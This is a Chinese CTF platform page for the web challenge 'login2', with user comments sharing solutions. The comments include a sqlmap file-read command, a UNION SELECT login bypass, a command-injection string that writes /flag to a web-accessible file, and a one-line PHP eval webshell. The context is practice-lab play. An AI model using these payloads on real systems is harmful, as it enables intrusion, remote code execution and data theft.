login2WEB 未解决

分数: 40 金币: 6
题目作者: 未知
一  血: ShawRoot
一血奖励: 5金币
解  决: 2781
提  示: 命令执行
描  述:
login2
评论
蟹不揉 12天前

用sqlmap扫一遍发现有SQL注入漏洞,权限足够高直接sqlmap -r post.txt --batch --file-read=/flag

回复 0

qq1002517 2月前

flag{******}

回复 0

5883120xly 6月前

username= ' UNION SELECT '任意用户名', 'fae0b27c451c728867a567e8c1bb4e53' -- password=666 进入命令执行界面输入 666 | cat /flag >2.txt 访问http://117.72.52.127:14324/2.txt即可

回复 1

你文博哥哥 8月前

首先爆破,没出来,sqlmap扫了,账号密码为空,丫的,没法去找有用信息,源码,请求头,都没,最后在返回包找到了tip,解码,得到注入点,username输入admin'union select 1,md5(123)#&password(123),得到监控系统,然后看见输入框,想到了rce,然后尝试输入1,然后输入ls /,没回显,被过滤,后面利用tee命令,将查找写入新文件,访问即可

回复 0

一个姓⎝李⎠的师傅~ 8月前

做了 3 个小时,完整记录了自己的 25 个步骤,sqlmap 省略了因为没有可用信息! 来看看吧,肯定会对你有帮助,联合注入的发现,命令执行写入文件绕过没有网页回显命令内容的办法,包括路径的讲解: https://www.yuque.com/u21437924/ap9vtm/gqkc3dcfmfpe5p85?singleDoc#zIr77

回复 11

꧁༺༽༾ཊCCཏ༿༼༻꧂ 8月前

没难度

回复 1

六分之杰 8月前

https://zhuanlan.zhihu.com/p/7343164566

回复 0

D调丶Slayer 8月前

https://blog.csdn.net/weixin_58111246/article/details/123482301?spm=1001.2014.3001.5501

回复 0

19957910119 9月前

1&&echo '<?php @eval($_POST['shell']);phpinfo();?>'>test.php

回复 0

ctfer-pls 9月前

看了评论厉害了

回复 0

WriteUp

image
harry

6 金币

评分(11)

解题动态

掘金 攻破了该题 3小时前
admincon 攻破了该题 4小时前
box 攻破了该题 6小时前
suxiansheng 攻破了该题 22小时前
东君 攻破了该题 1天前
grgeg 攻破了该题 1天前
bjyuxiao 攻破了该题 1天前
白科技 攻破了该题 1天前
极品老学生 攻破了该题 2天前
13017563726 攻破了该题 2天前
3167107269 攻破了该题 2天前
46963009 攻破了该题 2天前
shuida 攻破了该题 2天前
Anonymous.. 攻破了该题 2天前
123456789000000 攻破了该题 3天前
admin_ 攻破了该题 3天前
xfgg 攻破了该题 3天前
捷克斯洛伐克 攻破了该题 3天前
粉红色的-毛 攻破了该题 3天前
H&M 攻破了该题 4天前
问题反馈